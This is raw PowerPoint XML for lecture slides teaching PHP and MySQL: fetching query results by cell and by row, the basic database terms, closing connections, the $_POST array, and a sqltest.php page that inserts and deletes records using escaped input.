            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK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708367-710E-4EEB-9C5C-EA639C668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04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80C56-C191-4A4F-814D-007EDA0D6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10-4. Fetching results one cell at a time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F720A-09F5-41F9-90DD-A3DAA1B09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  $result-&gt;close();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  $connection-&gt;close();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK" sz="2800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708367-710E-4EEB-9C5C-EA639C668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649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D212-0380-4585-A6AE-BDEE2270C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Figure 10-1. The output from the query-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>mysqli.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> program in Example 10-4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9F2800-A9CA-4A10-B24D-3129721B9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18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5CDF0F8-D316-4E3F-8E55-F7902FBF28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3410" y="1248811"/>
            <a:ext cx="9245178" cy="5528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188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094CF-0868-4519-9CC1-B15B70A8D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Fetching a row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3B860-8FBC-48C1-9F52-F68477545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6" y="1301674"/>
            <a:ext cx="11559492" cy="567664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 fetch one row at a time, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method returns a single row of data as an array and automatically advances the row pointer to the next row.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of array returned depends on the argument specified (optional):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MYSQLI_NUM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Numeric array is returned where each column appears in the array in the order in which it was defined in the table.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MYSQLI_ASSOC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Associative array is returned where each key is the name of a column.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MYSQLI_BOTH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both associative and numeric arrays will be returned (default).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Associative arrays are preferred to use to avoid remembering the column order.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3CC34B-D4FE-4D77-A5A9-C7E1FEF43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529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3E252-34C4-4A10-AEE6-AF6098AF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Database Terms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A56E5-A0B8-4EDE-897B-96BC2FB58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Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The overall container for a collection of MySQL data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A sub-container within a database that stores the actual data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Row</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A single record within a table, which may contain several fields.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Column</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The name of a field within a row.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BFC74-6670-4D08-B2B9-E93217C69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778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F6E61-6191-44D5-81C4-5B8ABCD0B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10-5. Fetching results one row at a time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41F26-DE85-4A5F-B8E0-96A6B2FAA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4279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&lt;?php // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>fetchrow.php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err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  $query = "SELECT * FROM classics";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  if (!$result) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  $rows = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK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01FC2B-88B6-4114-91A5-E59BB0B41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354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F6E61-6191-44D5-81C4-5B8ABCD0B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10-5. Fetching results one row at a time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41F26-DE85-4A5F-B8E0-96A6B2FAA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623660" cy="54197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  for ($j = 0 ; $j &lt; $rows ; ++$j) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PK" b="1" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>    $row = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(MYSQLI_ASSOC);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>    echo 'Author: ' . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>($row['author']) . '&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>    echo 'Title: ' . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>($row['title']) . '&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>    echo 'Type: ' . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>($row['type']) . '&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>    echo 'Year: ' . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>($row['year']) . '&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>    echo '&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PK" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result-&gt;close();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $conn-&gt;close();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK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01FC2B-88B6-4114-91A5-E59BB0B41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622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38B64-3924-4A32-BAB2-72DF46FF0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a connection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21CDC-E218-4F52-9223-38472C220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543450" cy="5427914"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When script is finished PHP will return the allocated memory automatically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For large scripts and higher-traffic pages, it is preferred to manually release memory. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This best practice ensures that resources are returned to the system as quickly as possible to keep MySQL running optimally.</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Call the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> methods of the objects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$result </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$conn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>when each object is no longer needed, like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>$result-&gt;close();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>$conn-&gt;close();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37CA8-C2B4-48DA-8B55-B7DC97BCD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2472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7DCFD-5413-48AF-A63A-62452722E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Practical Example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A983A-9668-485E-B85D-C49AAFC7C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283321"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A web page that can insert data, delete data, and display data from a MySQL table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A HTML form is used to get data from user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used to check if all values have been posted, then a function fetches the input from browser and places it in PHP variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method of the connection object is used to escape any quotes to make valid SQL statements and avoid SQL injections.</a:t>
            </a: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627240-28E7-4D3A-99AF-661E476B8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751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FE2BA-295B-4180-A92D-654AFE7A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$_POST Array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92986-6C0C-4E97-B846-6B394317C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Browser sends user input through either GET or POST request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST request is preferred because it avoids placing data in the browser’s address bar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$_POST is an associative array that will be populated with the form data where each key in the array is named after the input field.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not write to an element in the $_POST array. Its only purpose is to communicate information from the browser to the program. Copy data to your own variables before altering it.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D3F3A4-708C-411E-B433-B2944EB90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274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EF862-0F44-4ECF-9174-E7CDFEE18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the Database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C4C47-2463-4FBD-A835-10EFCB363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Query is sent to MySQL to fetch all the records from the table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then, number of rows in the table is determined.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the number of rows value, a loop is iterates over all rows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method is used to get contents of each row, which is then displayed using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>herehoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> echo statement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another form also posts two hidden fields of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the same web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A submit button with the name DELETE RECORD is displayed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lastly, close method is called to release the resources.</a:t>
            </a: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DDB32-68AB-45DF-A856-116B01E36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1663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DF094-C51E-465F-882A-45C5BF373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Deleting and Inserting a Record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5D56E-ECB0-49A0-9A6B-941D39798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variable $_POST['delete'] has a value, it means that user wants to delete the record.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ISBN uniquely identifies each record. This value is appended to the DELETE query sting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If is not set, then user wants to insert a record. All posted values are checked, and INSERT INTO query string is generated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query string is then passed to the query method for execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Result is checked and error handling is implemented.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E5E9E2-A22C-4A14-93CD-E88896277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874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C8367-5911-4A7A-9686-301345C55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Displaying the Form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F6790-990F-44A3-85D5-EE57799E2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displaying the form the output is sanitized by passing values to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function, to replace any potentially dangerous HTML characters with harmless HTML entities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A submit button with the name ADD RECORD is displayed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The contents of the form fields are submitted to the same file.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0D6BF0-E914-4DDB-811D-C63EEED3C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89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3E252-34C4-4A10-AEE6-AF6098AF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Example 10-6. Inserting and deleting using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sqltest.php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A56E5-A0B8-4EDE-897B-96BC2FB58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2692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&lt;?php // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqltest.php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require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_POST['delete']) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>']))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>get_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($conn, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $query = "DELETE FROM classics WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        if (!$result) echo "DELETE failed&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&lt;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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  }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BFC74-6670-4D08-B2B9-E93217C69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740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252EC-C7CA-4CEA-BA01-D1C973A6B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Example 10-6. Inserting and deleting using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sqltest.php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22ACE-A121-4536-9AB7-C0BE96A10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516215" cy="58965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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_POST['author']) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_POST['title']) &amp;&amp;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isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_POST['category']) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_POST['year']) &amp;&amp;      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isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'])) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PK" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $author = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>get_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($conn, 'author');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $title = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>get_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($conn, 'title');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $category = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>get_post</a:t>
            </a:r>
            <a:r>
